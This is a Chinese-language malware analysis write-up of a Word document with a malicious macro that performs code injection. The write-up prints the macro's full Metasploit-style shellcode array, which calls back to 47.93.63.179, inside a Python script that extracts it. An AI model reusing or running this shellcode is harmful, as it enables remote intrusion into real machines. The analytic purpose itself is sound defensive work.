MAS系列-MDA2

分析样本: 070281b8c1a72893182928c21bf7241a0ad8c95879969d5f58e28d08f1a73b55

‍

收集信息

​ ​ ​ ​

我们搜集到了以下信息

• 他是一个 **Microsoft Word 2007+**，所以它是一个zip container
• 它与特定的IP地址和端口通信：47.93.63.179:7498
• 它的家族是Metasploit
• 它可能有代码注入
• 这个样本可能会会把文件dumps到Windows目录
• 有嵌入的宏

分析

使用zipdump.py分析文件

​

5(word/vbaProject.bin) 比较可疑，继续分析5

​

对象3是个宏，也是OLE文件中最大的对象。宏是以压缩的形式存储的，因此在读取其内容之前必须先解压缩

​ ​

直接SHIFT打开文件，ALT + F11查看宏

​

分析

​

• 这个代码像是Cobalt Strike / Metasploit 生成的代码
• 调用了CreateRemoteProcess(), VirtualAllocEx()和WriteProcessMemory() 证实了代码注入行为
• 有一个长度很大的数组，可能是ShellCode或者一个PE文件

编写一个简单的Python代码将ShellCode提取出来

import struct
import os


myArray = [-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49,
           13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -
           64, 116, 74, 1, -48, 80, -117, 72, 24, -
           117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1,
           -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -
           30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4,
           -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -
           21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1,
           -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -
           55, 81, 81, 106, 3, 81, 81, 104, 74, 29, 0, 0, 83, 80, 104, 87, -119, -97,
           -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -
           21, 85, 46, 59, -1, -43, -119, -58, -125, -
           61, 80, 49, -1, 87, 87, 106, -1, 83, 86,
           104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -
           119, -7, -21, 9, 104, -86, -59, -30, 93, -
           1, -43, -119, -63, 104, 69, 33, 94, 49, -1,
           -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -
           57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1,
           -1, -1, 47, 116, 97, 79, 56, 0, -21, 16, 49, -71, -117, 51, 127, -117, -33, 54, 31, -69, -
           19, 48, 21, -37, -56, -107, -59, 23, -88, -63, 0, -
           104, -116, -51, -104, 65, -48, -118, -80, 62,
           123, -103, -51, -124, -11, -27, 50, 17, -77, -115, 98, 29, 106, -71, -108, 35, 99, -94, 70, 89, -
           41, 14, -9, 114, -126, -101, -95, -16, -
           75, 44, 28, 59, -70, 123, -27, 55, 63, -86, 8, 66,
           -3, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77,
           83, 73, 69, 32, 55, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 48, 41, 13, 10, 0, 62, 73, 5, 8, -
           70, 26, -68, 95, 117, -58, -111, -107, 21,
           47, -40, -43, 89, 118, 112, -18, 17, 116, -104, 95, 44, -45, -100, -125, 106, 75, -7, -57, 92, -
           90, -44, -128, -53, 22, -20, 101, 119, -65, -
           69, -87, 29, 90, 118, 66, 24, 20, -60, 86, -86,
           -69, 89, 56, 15, 74, 78, 113, 44, 73, -16, -52, -119, 13, 5, -24, -71, -64, 127, -79, -61, -126, -
           53, -105, -7, 76, -108, -60, -75, 41, -101, -61, -
           14, -10, 65, 120, -70, -117, -120, 55, -110,
           51, 94, -73, -52, 82, -66, 10, -103, -105, -92, 32, -44, 8, -88, 126, 14, 75, -29, -72, -
           19, -87, 5, -61, 7, -109, -41, 23, -91, -
           116, 41, 24, -84, -47, 6, -99, 110, -117, 78, -47, 1,
           -112, -55, 29, 110, 32, 30, -83, 107, -101, 65, 111, -73, 113, -100, 64, -117, -103, -117, -
           30, 73, 102, 66, 76, -3, -51, 56, -66, -33, -73, -
           2, -5, -116, 17, 71, 75, 39, 61, 69, -44, 48,
           5, -28, 108, -42, -58, -116, -5, 112, 42, -91, -69, 30, -90, 46, -20, -50, -18, -37, -54, -125, -
           27, 90, 30, 106, 62, -73, -88, 102, -113, 105, 116, 96, -
           101, 73, -9, -15, -8, 20, -125, -63,
           -7, 15, -124, 49, 6, -61, -87, 24, -84, 72, -113, 38, 32, 0, -30, 5, 124, 52, 18, -
           99, 46, 11, 56, -9, -14, 0, 104, -16, -75, -
           94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0,
           104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -
           39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43,
           -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 52, 55, 46, 57, 51, 46, 54, 51, 46, 49, 55, 57, 0, 18, 52, 86, 120]
c = [x & 0XFF for x in myArray]
print(bytes(c))

f = open("shellcode.bin", "wb")
for i in myArray:
    write_byte = struct.pack("<b", i)
    f.write(write_byte)
f.close()

010Editor打开分析，显然不是PE文件，应该是一个ShellCode

​

‍

可以用scdbg.exe去仿真执行

​

至此，分析结束

‍